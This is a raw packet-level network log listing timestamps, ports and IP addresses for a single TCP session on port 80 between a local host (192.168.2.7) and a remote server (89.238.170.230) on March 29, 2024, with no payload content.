Mar 29, 2024 14:25:08.695638895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.695660114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.695777893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:08.695890903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.695925951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.695940971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:08.695966959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:08.913948059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.914001942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:08.914035082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.914047956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.914062977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.914077044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.914079905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:08.914091110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:08.914099932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:08.914122105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.140408993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140569925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.140764952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140779972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140841961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.140852928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140866995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140878916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140902042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.140945911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.140996933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.371089935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.371236086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.371324062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.371336937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.371349096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.371387959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.371412039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.371524096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.371572018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.371613026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.371663094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.589596033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.589632988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.589644909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.589817047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.589849949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.589849949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.797228098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.797328949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.797343016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.797360897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.797391891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:09.797462940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:09.797506094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.010726929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.010782957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.010788918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.010824919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.010828018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.010858059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.010869980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.010900021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.010927916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.010966063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.010971069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.011003017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.011054993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.011090994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.237744093 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.237876892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.237978935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.237993002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.238028049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.238121033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.238168955 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.238269091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.238313913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.467010021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467034101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467114925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.467154026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467195988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.467219114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467259884 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467281103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.467299938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.467328072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467367887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.467390060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.467433929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.695683002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.695718050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.695741892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.695765972 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.695806980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.695847034 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.695868015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.695904970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.696997881 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.697040081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.697067022 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.697104931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.697120905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.697164059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.907099962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.907175064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.907382965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.907397032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.907424927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.907449961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.908569098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.908588886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.908607960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.908623934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.908760071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.908802032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:10.908833027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:10.908871889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.132056952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.132178068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.132364988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.132379055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.133476019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.133649111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.133888960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.133902073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.133934975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.133936882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.133963108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.133976936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.348292112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.348356009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.349483967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.349534988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.349739075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.349785089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.349939108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.349986076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.350115061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.350158930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.350214005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.350259066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.350280046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.350325108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.561417103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.561481953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.562197924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.562211990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.562244892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.562267065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.562472105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.562489986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.562517881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.562539101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.562738895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.562781096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.562787056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.562818050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.777857065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.777879000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.777985096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.778420925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.778438091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.778479099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.778506994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.778567076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.778580904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.778620005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.778634071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.778897047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.778909922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.778942108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.778954983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.999886036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.999908924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:11.999960899 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:11.999990940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.000283003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.000325918 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.000329971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.000361919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.001318932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.001336098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.001367092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.001375914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.001389980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.001420975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.001445055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.220732927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.220782042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.220855951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.220921993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.220942020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.220966101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.221044064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.221941948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.222018957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.222047091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.222101927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.222114086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.222197056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.222197056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.222254038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.222278118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.222312927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.222322941 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.222376108 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.437737942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.437849998 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.437928915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.437990904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.438029051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.438072920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.438819885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.438899040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.438910961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.438977957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.439063072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.439121962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.439140081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.439208031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.439387083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.439433098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.439448118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.439533949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.439538002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.439578056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.663193941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663311958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.663322926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663389921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.663486958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663567066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.663630009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663644075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663701057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.663770914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663841009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.663902998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.663959980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.664396048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.664407969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.664475918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.664537907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.664598942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886159897 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886254072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886445045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886459112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886496067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886507988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886593103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886605978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886641979 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886815071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886830091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886864901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886889935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.886950016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.886992931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.887120962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.887141943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:12.887167931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.887178898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:12.906919003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.134185076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189029932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189085007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189161062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189199924 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189210892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189210892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189210892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189254045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189263105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189305067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189316034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189366102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189387083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189425945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.189443111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.189481974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.202951908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.203011036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.402654886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.402693033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.402714968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.402735949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.402743101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.402796030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.402878046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.402920961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.402972937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.403014898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.403316975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.403359890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.403537035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.403584957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.415862083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.415914059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.415954113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.415992975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.456938028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.457109928 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.624264002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.624362946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.624576092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.624624968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.624741077 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.624787092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.625195026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.625241995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.638411045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.638459921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.638560057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.638609886 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.680912018 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.680984020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.846867085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.846970081 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.847151995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.847167015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.847187996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.847206116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.847223043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.847235918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.847266912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.860224009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.860281944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:13.899763107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.899779081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:13.899899006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.055700064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.055784941 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.055886984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.055927992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.055931091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.055972099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.056026936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.056077957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:14.056107044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:14.056149006 CET	49699	80	192.168.2.7	89.238.170.230
